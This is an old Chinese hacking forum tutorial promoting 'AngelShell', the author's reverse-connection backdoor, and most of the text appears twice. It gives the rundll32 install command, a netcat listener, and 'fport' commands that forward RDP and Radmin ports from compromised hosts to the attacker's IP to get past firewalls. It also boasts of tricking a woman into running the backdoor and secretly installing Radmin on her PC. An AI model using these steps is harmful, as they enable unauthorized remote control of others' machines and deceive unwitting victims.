AngelShell:讓所有正向程序實現反向連接(應用篇)
更新時間:2007年01月16日 00:00:00 作者:
現在的服務器幾乎全是放在硬件防火墻后的,好不容易滲透進去,結果卻發(fā)現裝有硬件防火墻,掃興啊!什么終端服務、什么Radmin之類的控方式想都不要想。試了試,發(fā)現幾乎都支持反向連接,正向連接只能連接80和21端口,連1433都連不上。那就傳個反向的后門上去吧,一傳上去就被殺毒軟件Kill了。一氣之下,搬出Delphi,自己動手寫后門!花了幾天的時間,后門終于寫好了,也達到了理想中的要求,使用效果非常不錯,足以稱為硬件防火墻和內網肉雞的噩夢了!不敢獨享,趕緊拿出來給大家共同分享一下。
這個程序叫AngelShell,這里用我的肉雞和自己使用的計算機做測試。首先需要在本地配置一個記載反向連接信息的文件,第一行是自己的IP,第二行是用NC監(jiān)聽的端口。寫好后把它放到HTTP空間上,然后進行配置:配置好密碼和你剛才上傳到FTP空間里的HTTP訪問地址。
你可以選擇生成DLL的服務端或者EXE的服務端,其中EXE的服務端直接運行即可安裝,而DLL的服務端則需要用如下命令安裝:“rundll32 dll路徑,I”,記得最后一個I一定要大寫。
小提示:程序作者其實是為了方便大家才提供的EXE服務端,其本質也是安裝DLL程序,只不過是用程序來解包并自動實現安裝。
這里我以DLL服務端來示范。先把DLL傳到心愛的肉雞上面,然后在命令行上面打入:“rundll32 angel.dll,I”。注意這里我是通過FTP連接上肉雞的,為了方便就直接用FTP的命令行安裝了。
裝好以后,在自己的機器上用:“nc –v –l –p 7787”監(jiān)聽7787端口,也就是我最開始寫的配置文件里的端口。過了一會NC就提示有信息傳輸,輸入密碼敲回車,OK,連接成功。幫助信息顯示后,可愛的Shell出來了。
小提示:這個后門還提供了一些附加命令,可以直接在Shell中執(zhí)行。作者為了避免與已有的程序名沖突,所以附加命令全部為小寫。
講到這里,大家也許會覺得偶這款后門除了可以生成EXE服務端以外,也沒什么特別的。當然,就這些功能當然不夠打造出我的特色,也不能算是硬件防火墻的噩夢。我們這次用的后門,不僅是要讓它自己能夠實現反向連接,而且要讓其它所有的能正向連接的程序都實現反向連接,比如終端服務、Radmin、MSSQL等等!呵呵,不要吃驚,好戲正在后頭呢,偶不會讓大家失望的,Let's GO!
看到Shell里的Fport附加命令沒有?也就是端口轉發(fā),它可以把遠程計算機的任意端口反向模擬到本地來。什么?你沒懂?呵呵,沒關系,往下看就知道了。我們先來測試一下Windows的終端服務。這臺肉雞以前就被我開過終端服務了,但一直苦于硬件防火墻的攔截而無法連接,今天要好好爽一下!
小知識:Fport的用法:
fport
其中參數local port是指你在肉雞上要轉發(fā)的端口,Your IP 是你的IP(或域名,YourPort是指你的客戶端上監(jiān)聽的端口。
打開客戶端,在“要模擬的端口”上面填3389,在“連接遠程計算機的端口”上任意填,當然不要與已開的端口沖突,這里我填7788,然后點“開始監(jiān)聽”。趕緊到肉雞的Shell下面敲入:“fport 3389 61.187.***.*** 7788”。其中3389是肉雞的終端服務的端口,7788是我們這邊這個連接遠程計算機的端口。然后客戶端上馬上提示已接收到遠程計算機的連接,提示此時已經可以連接本地的3389端口了。這樣我們就把肉雞上的3389端口搬到自己的愛機上來了。
朋友們,我們還等什么呢?打開終端服務登錄器,IP填上本地的127.0.0.1,連接,客戶端馬上顯示已經成功建立了一個新的連接,并出現了遠程桌面登錄的對話框,我心里那個激動啊,真是語言無法表達!
我們再試試登錄兩個用戶,客戶端又顯示成功建立了一個新的連接。事實證明,同時登錄2個用戶也成功了!當然,如果你愿意的話可以登錄更多的用戶,我編程的時候設置的每個連接都通過2個線程來進行數據傳輸,所以在傳輸速度方面是有保障的。
正沉浸在喜悅中時,電話響了,原來是一位MM買了攝像頭,叫我去幫她裝,這也要去?于是叫她上QQ,正好給偶再測試一次。這位MM雖然沒有硬件級的防火墻,但是她在內網,用的是Windows XP專業(yè)版。我先把EXE的服務端傳給她,叫她運行,然后在本地進行監(jiān)聽,過一會就提示收到信息并需要輸入密碼。輸入密碼后得到了一個Shell,再用文件下載功能給她安裝一個Radmin,夠陰險吧!然后敲入如下命令:“fport 4899 61.187.***.*** 7788”,將她的4899端口轉發(fā)到我的4899端口來,然后在本地打開Radmin Viewer,連接IP寫127.0.0.1,端口就用默認的4899,成功連接!。
幫她打開設備管理器,三下五除二裝好了攝相頭驅動程序,MM還楞在那不知道怎么回事,哈哈,等她反應過來后那個崇拜??!非吵著要拜我為師,汗……測試到這里也就結束了,心里的痛快就別提了,呵呵!
該程序理論上是支持任何協議的,但是由于某些協議的特殊性,它會對IP進行驗證,所以可能會達不到我們想要的效果。比如WEB服務,今天本來把肉雞上的80端口轉過來了,想騙騙別人說自己開了個網站。結果一連上來卻顯示什么:“No web……in this ……”,大概意思就是這個地址沒有WEB服務,這才想起HTTP協議中還有個Host的值不符合,難怪。
最后說一下關于在內網中使用本程序的方法。如果自己在內網的話,需要一臺允許正向連接的肉雞來做中轉,把要轉的那臺服務器的端口轉到這個中轉肉雞上,然后直接連接這個中轉肉雞就相當于連接服務器了!
好了,希望這篇文章能給大家?guī)韼椭笥褌兡芸吹竭@里,我也已經很感謝了。最后祝大家永遠開心,技術蒸蒸日上!
這個程序叫AngelShell,這里用我的肉雞和自己使用的計算機做測試。首先需要在本地配置一個記載反向連接信息的文件,第一行是自己的IP,第二行是用NC監(jiān)聽的端口。寫好后把它放到HTTP空間上,然后進行配置:配置好密碼和你剛才上傳到FTP空間里的HTTP訪問地址。
你可以選擇生成DLL的服務端或者EXE的服務端,其中EXE的服務端直接運行即可安裝,而DLL的服務端則需要用如下命令安裝:“rundll32 dll路徑,I”,記得最后一個I一定要大寫。
小提示:程序作者其實是為了方便大家才提供的EXE服務端,其本質也是安裝DLL程序,只不過是用程序來解包并自動實現安裝。
這里我以DLL服務端來示范。先把DLL傳到心愛的肉雞上面,然后在命令行上面打入:“rundll32 angel.dll,I”。注意這里我是通過FTP連接上肉雞的,為了方便就直接用FTP的命令行安裝了。
裝好以后,在自己的機器上用:“nc –v –l –p 7787”監(jiān)聽7787端口,也就是我最開始寫的配置文件里的端口。過了一會NC就提示有信息傳輸,輸入密碼敲回車,OK,連接成功。幫助信息顯示后,可愛的Shell出來了。
小提示:這個后門還提供了一些附加命令,可以直接在Shell中執(zhí)行。作者為了避免與已有的程序名沖突,所以附加命令全部為小寫。
講到這里,大家也許會覺得偶這款后門除了可以生成EXE服務端以外,也沒什么特別的。當然,就這些功能當然不夠打造出我的特色,也不能算是硬件防火墻的噩夢。我們這次用的后門,不僅是要讓它自己能夠實現反向連接,而且要讓其它所有的能正向連接的程序都實現反向連接,比如終端服務、Radmin、MSSQL等等!呵呵,不要吃驚,好戲正在后頭呢,偶不會讓大家失望的,Let's GO!
看到Shell里的Fport附加命令沒有?也就是端口轉發(fā),它可以把遠程計算機的任意端口反向模擬到本地來。什么?你沒懂?呵呵,沒關系,往下看就知道了。我們先來測試一下Windows的終端服務。這臺肉雞以前就被我開過終端服務了,但一直苦于硬件防火墻的攔截而無法連接,今天要好好爽一下!
小知識:Fport的用法:
fport
其中參數local port是指你在肉雞上要轉發(fā)的端口,Your IP 是你的IP(或域名,YourPort是指你的客戶端上監(jiān)聽的端口。
打開客戶端,在“要模擬的端口”上面填3389,在“連接遠程計算機的端口”上任意填,當然不要與已開的端口沖突,這里我填7788,然后點“開始監(jiān)聽”。趕緊到肉雞的Shell下面敲入:“fport 3389 61.187.***.*** 7788”。其中3389是肉雞的終端服務的端口,7788是我們這邊這個連接遠程計算機的端口。然后客戶端上馬上提示已接收到遠程計算機的連接,提示此時已經可以連接本地的3389端口了。這樣我們就把肉雞上的3389端口搬到自己的愛機上來了。
朋友們,我們還等什么呢?打開終端服務登錄器,IP填上本地的127.0.0.1,連接,客戶端馬上顯示已經成功建立了一個新的連接,并出現了遠程桌面登錄的對話框,我心里那個激動啊,真是語言無法表達!
我們再試試登錄兩個用戶,客戶端又顯示成功建立了一個新的連接。事實證明,同時登錄2個用戶也成功了!當然,如果你愿意的話可以登錄更多的用戶,我編程的時候設置的每個連接都通過2個線程來進行數據傳輸,所以在傳輸速度方面是有保障的。
正沉浸在喜悅中時,電話響了,原來是一位MM買了攝像頭,叫我去幫她裝,這也要去?于是叫她上QQ,正好給偶再測試一次。這位MM雖然沒有硬件級的防火墻,但是她在內網,用的是Windows XP專業(yè)版。我先把EXE的服務端傳給她,叫她運行,然后在本地進行監(jiān)聽,過一會就提示收到信息并需要輸入密碼。輸入密碼后得到了一個Shell,再用文件下載功能給她安裝一個Radmin,夠陰險吧!然后敲入如下命令:“fport 4899 61.187.***.*** 7788”,將她的4899端口轉發(fā)到我的4899端口來,然后在本地打開Radmin Viewer,連接IP寫127.0.0.1,端口就用默認的4899,成功連接!。
幫她打開設備管理器,三下五除二裝好了攝相頭驅動程序,MM還楞在那不知道怎么回事,哈哈,等她反應過來后那個崇拜??!非吵著要拜我為師,汗……測試到這里也就結束了,心里的痛快就別提了,呵呵!
該程序理論上是支持任何協議的,但是由于某些協議的特殊性,它會對IP進行驗證,所以可能會達不到我們想要的效果。比如WEB服務,今天本來把肉雞上的80端口轉過來了,想騙騙別人說自己開了個網站。結果一連上來卻顯示什么:“No web……in this ……”,大概意思就是這個地址沒有WEB服務,這才想起HTTP協議中還有個Host的值不符合,難怪。
最后說一下關于在內網中使用本程序的方法。如果自己在內網的話,需要一臺允許正向連接的肉雞來做中轉,把要轉的那臺服務器的端口轉到這個中轉肉雞上,然后直接連接這個中轉肉雞就相當于連接服務器了!
好了,希望這篇文章能給大家?guī)韼椭笥褌兡芸吹竭@里,我也已經很感謝了。最后祝大家永遠開心,技術蒸蒸日上!